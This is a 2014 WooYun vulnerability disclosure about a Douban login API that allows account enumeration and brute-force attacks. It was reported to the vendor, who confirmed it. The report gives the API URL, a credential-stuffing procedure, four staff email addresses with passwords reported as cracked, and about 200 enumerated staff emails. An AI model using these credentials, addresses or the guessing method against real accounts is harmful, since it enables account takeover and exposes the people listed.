当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-066571

漏洞标题:豆瓣某API扫号和暴力破解的问题

相关厂商:豆瓣

漏洞作者: lijiejie

提交时间:2014-06-28 20:31

修复时间:2014-08-12 20:32

公开时间:2014-08-12 20:32

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:3

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-28: 细节已通知厂商并且等待厂商处理中
2014-06-28: 厂商已经确认,细节仅向厂商公开
2014-07-08: 细节向核心白帽子及相关领域专家公开
2014-07-18: 细节向普通白帽子公开
2014-07-28: 细节向实习白帽子公开
2014-08-12: 细节向公众公开

简要描述:

豆瓣网API扫号和暴力破解的小问题

详细说明:

还是一年多前曾经提到过的API:
http://www.douban.com/j/app/login?email={email}&password={password}&app_name=radio_desktop_win&version=50
现在依然存在的问题是:
1) 可以拿泄露的库扫号,当然,用很老的库扫出来的号已经提示被临时锁定了,这一点豆瓣网是做得非常好的。说明豆瓣重视安全
2) 错误提示过于详细,可以猜解邮箱/手机号是否存在
2) 可以在只知道手机号或邮箱的情况下批量扫号。
测试发现在一定时间内是可以错误一定次数的。
这个不太好利用,但仍旧可以撞号。
比如: 维护一个10万账号的队列,以及一个top 100的密码队列,批量撞号。
一旦遇到被锁定,就把账号挂到队列尾部,等待下次继续撞号。如此反复。
可参考我之前扫人人网账号的方式:
WooYun: 人人网暴力破解及两处验证码安全问题[破解10万,成功2123]

漏洞证明:

简单破解几位豆瓣邮箱的用户:

email=douban@douban.com&password=123456789
email=gelei@douban.com&password=000000
email=mijun@douban.com&password=111111
email=yuzhe@douban.com&password=123456789


猜解豆瓣用户名:

a@douban.com
all@douban.com
book@douban.com
event@douban.com
help@douban.com
literature@douban.com
movie@douban.com
partner@douban.com
read@douban.com
rich@douban.com
sky@douban.com
system@douban.com
team@douban.com
test@douban.com
changdong@douban.com
chenbin@douban.com
chengang@douban.com
chengeng@douban.com
chenjing@douban.com
chenlin@douban.com
chennuo@douban.com
chenwei@douban.com
chentuo@douban.com
chenxi@douban.com
chenyang@douban.com
chenyi@douban.com
chenzhi@douban.com
chengang@douban.com
chengbai@douban.com
congrong@douban.com
dahai@douban.com
dajin@douban.com
daluo@douban.com
danglu@douban.com
dingning@douban.com
dingwei@douban.com
dingyi@douban.com
dongyu@douban.com
douban@douban.com
duanxu@douban.com
fangjian@douban.com
fangshan@douban.com
fujian@douban.com
fuyao@douban.com
gao@douban.com
gaobin@douban.com
gaocheng@douban.com
gaolei@douban.com
gaoyan@douban.com
gelei@douban.com
genglin@douban.com
gonghao@douban.com
guanyu@douban.com
guojing@douban.com
guoxin@douban.com
haibo@douban.com
haidong@douban.com
haoyi@douban.com
hetao@douban.com
hexu@douban.com
hexuan@douban.com
houmai@douban.com
hujing@douban.com
huming@douban.com
huwei@douban.com
huashan@douban.com
huanghuang@douban.com
huanghuan@douban.com
huangjian@douban.com
huangjie@douban.com
huanglei@douban.com
huangjin@douban.com
huangqian@douban.com
huiming@douban.com
jiang@douban.com
jianing@douban.com
jiawei@douban.com
jiangou@douban.com
jiangou@douban.com
jiangning@douban.com
jiangpeng@douban.com
jiaojiao@douban.com
jinchao@douban.com
kanglu@douban.com
kangnan@douban.com
kebin@douban.com
kongzhen@douban.com
laiwei@douban.com
lantian@douban.com
leiye@douban.com
lifei@douban.com
lijian@douban.com
lijun@douban.com
lile@douban.com
lina@douban.com
lishun@douban.com
liyan@douban.com
liying@douban.com
liyang@douban.com
lizheng@douban.com
liaofeng@douban.com
lina@douban.com
linju@douban.com
lingling@douban.com
liuhe@douban.com
liujia@douban.com
liujin@douban.com
liukang@douban.com
liulu@douban.com
liumao@douban.com
liuwei@douban.com
liuyan@douban.com
liuye@douban.com
liuyue@douban.com
luchen@douban.com
luchuan@douban.com
lukun@douban.com
luying@douban.com
luoxi@douban.com
luoxin@douban.com
mati@douban.com
manchun@douban.com
maoyun@douban.com
menghan@douban.com
mengmeng@douban.com
mengwei@douban.com
mijun@douban.com
miaomiao@douban.com
minchi@douban.com
ningan@douban.com
ningan@douban.com
qiwei@douban.com
qingfeng@douban.com
renfei@douban.com
ruhan@douban.com
ruishan@douban.com
shangting@douban.com
shenfei@douban.com
shiqun@douban.com
shuo@douban.com
sihuan@douban.com
songni@douban.com
songye@douban.com
sujia@douban.com
surui@douban.com
suannai@douban.com
sunhao@douban.com
sunyi@douban.com
sunzhen@douban.com
tajia@douban.com
tanglei@douban.com
tifa@douban.com
tianlei@douban.com
tianqian@douban.com
tongyu@douban.com
wangchen@douban.com
wangcheng@douban.com
wangfang@douban.com
wangfei@douban.com
wanghu@douban.com
wangjie@douban.com
wanglong@douban.com
wangqiong@douban.com
wangxin@douban.com
wangye@douban.com
wangying@douban.com
wangzhe@douban.com
weina@douban.com
weizhen@douban.com
wenjing@douban.com
wenzhu@douban.com
woai@douban.com
wudi@douban.com
wuhong@douban.com
wuning@douban.com
wuqi@douban.com
wuwei@douban.com
xiliang@douban.com
xiachen@douban.com
xiaochou@douban.com
xiaoyan@douban.com
xinxin@douban.com
xuhua@douban.com
xujun@douban.com
xuyong@douban.com
xueming@douban.com
xueqin@douban.com
xueya@douban.com
yanjun@douban.com
yanwei@douban.com
yanxiao@douban.com
yangfan@douban.com
yanghang@douban.com
yangjing@douban.com
yangjie@douban.com
yangliu@douban.com
yangping@douban.com
yangqing@douban.com
yangrong@douban.com
yangsong@douban.com
yangyi@douban.com
yaofeng@douban.com
yejing@douban.com
yeke@douban.com
yangwei@douban.com
yingsi@douban.com
yongbin@douban.com
youjian@douban.com
yuan@douban.com
yudong@douban.com
yuguang@douban.com
yuzhe@douban.com
yunwang@douban.com
yunxi@douban.com
zhangchao@douban.com
zhangchi@douban.com
zhangdan@douban.com
zhanggan@douban.com
zhanglei@douban.com
zhangmiao@douban.com
zhangnan@douban.com
zhangqi@douban.com
zhangqian@douban.com
zhangqing@douban.com
zhangsi@douban.com
zhangying@douban.com
zhangyang@douban.com
zhangyu@douban.com
zhangzhe@douban.com
zhaofeng@douban.com
zhaoling@douban.com
zhaolin@douban.com
zhaoyuan@douban.com
zhaoyu@douban.com
zhengzhong@douban.com
zhouyao@douban.com
zhuliang@douban.com
zhuna@douban.com
zhuofan@douban.com
zhuna@douban.com
zouyin@douban.com

修复方案:

只是一点建议,可参考:
1) 太老版本的APP,可不再支持调用API,强制要求更新
2) APP上也需要考虑加入验证码,在某些条件下强制要求输入
3) 错误提示不要过于详细

版权声明:转载请注明来源 lijiejie@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2014-06-28 23:07

厂商回复:

谢谢反馈,立即组织修复〜

最新状态:

暂无